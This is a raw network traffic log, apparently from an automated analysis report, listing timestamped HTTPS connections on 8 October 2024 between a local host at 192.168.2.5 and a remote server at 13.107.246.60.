                                                                                                                                                            Oct 8, 2024 05:09:03.459701061 CEST49817443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:03.460144043 CEST49817443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:03.460170984 CEST4434981713.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:03.469862938 CEST49822443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:03.469902992 CEST4434982213.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:03.469970942 CEST49822443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:03.471080065 CEST49822443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:03.471096992 CEST4434982213.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:03.549554110 CEST4434981813.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:03.551493883 CEST49818443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:03.551522017 CEST4434981813.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:03.552810907 CEST49818443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:03.552817106 CEST4434981813.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:03.572964907 CEST4434981913.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:03.573975086 CEST49819443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:03.573987007 CEST4434981913.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:03.574812889 CEST49819443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:03.574819088 CEST4434981913.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:03.649049044 CEST4434981813.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:03.649209976 CEST4434981813.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:03.649293900 CEST49818443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:03.649924994 CEST49818443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:03.649976015 CEST4434981813.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:03.649993896 CEST49818443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:03.650010109 CEST4434981813.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:03.654414892 CEST49823443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:03.654459000 CEST4434982313.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:03.654529095 CEST49823443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:03.654675007 CEST49823443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:03.654696941 CEST4434982313.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:03.671680927 CEST4434981913.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:03.671850920 CEST4434981913.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:03.671911001 CEST49819443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:03.672502995 CEST49819443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:03.672523022 CEST4434981913.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:03.672538042 CEST49819443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:03.672543049 CEST4434981913.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:03.678153992 CEST4434982013.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:03.679527998 CEST49824443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:03.679565907 CEST4434982413.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:03.679634094 CEST49824443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:03.679704905 CEST49820443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:03.679714918 CEST4434982013.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:03.680588007 CEST49820443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:03.680593967 CEST4434982013.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:03.680731058 CEST49824443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:03.680743933 CEST4434982413.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:03.680800915 CEST4434982113.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:03.686054945 CEST49821443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:03.686093092 CEST4434982113.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:03.686788082 CEST49821443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:03.686793089 CEST4434982113.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:03.782141924 CEST4434982013.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:03.782206059 CEST4434982013.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:03.782267094 CEST49820443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:03.782773018 CEST49820443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:03.782788992 CEST4434982013.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:03.782802105 CEST49820443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:03.782807112 CEST4434982013.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:03.785254002 CEST4434982113.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:03.785394907 CEST4434982113.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:03.785481930 CEST49821443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:03.786979914 CEST49825443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:03.787054062 CEST4434982513.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:03.787121058 CEST49825443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:03.787272930 CEST49821443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:03.787302017 CEST4434982113.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:03.787328959 CEST49821443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:03.787341118 CEST4434982113.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:03.789839983 CEST49826443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:03.789864063 CEST4434982613.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:03.789984941 CEST49826443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:03.790165901 CEST49825443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:03.790196896 CEST4434982513.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:03.790406942 CEST49826443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:03.790430069 CEST4434982613.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:04.132957935 CEST4434982213.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:04.134170055 CEST49822443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:04.134268045 CEST4434982213.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:04.134958982 CEST49822443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:04.134975910 CEST4434982213.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:04.234263897 CEST4434982213.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:04.234329939 CEST4434982213.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:04.234489918 CEST49822443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:04.234786034 CEST49822443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:04.234786987 CEST49822443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:04.234836102 CEST4434982213.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:04.234863997 CEST4434982213.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:04.239619017 CEST49827443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:04.239655018 CEST4434982713.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:04.240818977 CEST49827443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:04.241240025 CEST49827443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:04.241252899 CEST4434982713.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:04.339703083 CEST4434982413.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:04.340495110 CEST49824443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:04.340509892 CEST4434982413.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:04.341581106 CEST49824443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:04.341586113 CEST4434982413.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:04.349786997 CEST4434982313.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:04.350405931 CEST49823443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:04.350414038 CEST4434982313.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:04.351140022 CEST49823443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:04.351144075 CEST4434982313.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:04.427522898 CEST4434982613.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:04.428103924 CEST49826443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:04.428169012 CEST4434982613.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:04.428622961 CEST49826443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:04.428637028 CEST4434982613.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:04.434823036 CEST4434982513.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:04.435173035 CEST49825443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:04.435190916 CEST4434982513.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:04.435597897 CEST49825443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:04.435627937 CEST4434982513.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:04.440339088 CEST4434982413.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:04.440526009 CEST4434982413.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:04.440599918 CEST49824443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:04.440648079 CEST49824443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:04.440660000 CEST4434982413.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:04.440665007 CEST49824443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:04.440669060 CEST4434982413.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:04.443906069 CEST49828443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:04.443931103 CEST4434982813.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:04.444102049 CEST49828443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:04.444461107 CEST49828443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:04.444474936 CEST4434982813.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:04.453906059 CEST4434982313.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:04.454067945 CEST4434982313.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:04.454132080 CEST49823443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:04.454147100 CEST49823443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:04.454153061 CEST4434982313.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:04.454168081 CEST49823443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:04.454171896 CEST4434982313.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:04.456883907 CEST49829443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:04.456926107 CEST4434982913.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:04.457175016 CEST49829443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:04.457298994 CEST49829443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:04.457307100 CEST4434982913.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:04.527643919 CEST4434982613.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:04.527720928 CEST4434982613.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:04.527832031 CEST49826443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:04.528053999 CEST49826443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:04.528104067 CEST4434982613.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:04.528137922 CEST49826443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:04.528153896 CEST4434982613.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:04.531507015 CEST49830443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:04.531524897 CEST4434983013.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:04.531795979 CEST49830443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:04.532016039 CEST49830443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:04.532027006 CEST4434983013.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:04.535499096 CEST4434982513.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:04.535542965 CEST4434982513.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:04.535689116 CEST49825443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:04.535836935 CEST49825443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:04.535851002 CEST4434982513.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:04.535896063 CEST49825443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:04.535902023 CEST4434982513.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:04.538615942 CEST49831443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:04.538636923 CEST4434983113.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:04.538820982 CEST49831443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:04.539026976 CEST49831443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:04.539040089 CEST4434983113.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:04.875288963 CEST4434982713.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:04.917191982 CEST49827443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:04.968364954 CEST49827443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:04.968385935 CEST4434982713.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:04.973665953 CEST49827443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:04.973671913 CEST4434982713.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.070396900 CEST4434982713.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.070456982 CEST4434982713.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.070506096 CEST49827443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.071399927 CEST49827443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.071417093 CEST4434982713.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.071428061 CEST49827443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.071434975 CEST4434982713.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.080868006 CEST49832443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.080902100 CEST4434983213.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.081006050 CEST49832443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.081829071 CEST49832443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.081837893 CEST4434983213.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.094881058 CEST4434982813.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.095767021 CEST49828443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.095776081 CEST4434982813.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.097287893 CEST49828443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.097292900 CEST4434982813.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.107994080 CEST4434982913.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.108392000 CEST49829443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.108411074 CEST4434982913.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.109270096 CEST49829443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.109273911 CEST4434982913.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.192290068 CEST4434983013.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.192801952 CEST4434983113.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.193193913 CEST49830443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.193218946 CEST4434983013.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.193459988 CEST4434982813.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.193495035 CEST4434982813.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.193536997 CEST49828443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.193547010 CEST4434982813.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.193574905 CEST4434982813.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.193620920 CEST49828443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.194577932 CEST49830443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.194582939 CEST4434983013.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.195444107 CEST49831443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.195451021 CEST4434983113.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.195858955 CEST49831443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.195863008 CEST4434983113.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.196369886 CEST49828443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.196383953 CEST4434982813.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.196393013 CEST49828443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.196398020 CEST4434982813.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.210967064 CEST49833443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.210999966 CEST4434983313.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.211055040 CEST49833443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.211421013 CEST49833443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.211430073 CEST4434983313.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.231100082 CEST4434982913.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.231245041 CEST4434982913.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.231298923 CEST49829443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.240823984 CEST49829443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.240850925 CEST4434982913.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.240865946 CEST49829443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.240871906 CEST4434982913.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.249592066 CEST49834443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.249598980 CEST4434983413.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.249661922 CEST49834443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.250427961 CEST49834443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.250439882 CEST4434983413.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.293251038 CEST4434983013.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.293410063 CEST4434983013.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.293473005 CEST49830443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.293960094 CEST49830443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.293983936 CEST4434983013.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.293999910 CEST49830443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.294004917 CEST4434983013.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.296715021 CEST4434983113.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.296763897 CEST4434983113.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.296821117 CEST49831443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.296832085 CEST4434983113.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.296895027 CEST4434983113.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.296940088 CEST49831443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.298638105 CEST49831443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.298648119 CEST4434983113.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.304685116 CEST49835443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.304718971 CEST4434983513.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.304774046 CEST49835443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.306402922 CEST49835443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.306416035 CEST4434983513.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.309462070 CEST49836443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.309494019 CEST4434983613.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.309544086 CEST49836443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.309825897 CEST49836443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.309838057 CEST4434983613.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.731452942 CEST4434983213.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.732391119 CEST49832443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.732408047 CEST4434983213.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.733212948 CEST49832443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.733217955 CEST4434983213.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.831456900 CEST4434983213.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.831475019 CEST4434983213.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.831537962 CEST4434983213.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.831557989 CEST49832443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.831593037 CEST49832443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.831998110 CEST49832443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.832019091 CEST4434983213.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.832029104 CEST49832443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.832035065 CEST4434983213.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.835975885 CEST49837443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.836067915 CEST4434983713.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.836205959 CEST49837443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.836414099 CEST49837443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.836448908 CEST4434983713.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.853411913 CEST4434983313.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.854001999 CEST49833443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.854032040 CEST4434983313.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.854590893 CEST49833443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.854595900 CEST4434983313.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.899296045 CEST4434983413.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.899749994 CEST49834443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.899758101 CEST4434983413.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.900209904 CEST49834443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.900213957 CEST4434983413.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.952122927 CEST4434983613.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.952728033 CEST49836443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.952774048 CEST4434983613.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.953051090 CEST4434983313.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.953085899 CEST4434983313.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.953177929 CEST49833443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.953201056 CEST4434983313.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.953350067 CEST49836443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.953357935 CEST4434983613.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.953546047 CEST49833443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.953546047 CEST49833443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.953555107 CEST4434983313.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.953602076 CEST4434983313.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.953721046 CEST4434983313.107.246.60192.168.2.5
                                                                                                                                                            Oct 8, 2024 05:09:05.956809044 CEST49838443192.168.2.513.107.246.60
                                                                                                                                                            Oct 8, 2024 05:09:05.956892967 CEST4434983813.107.246.60192.168.2.5
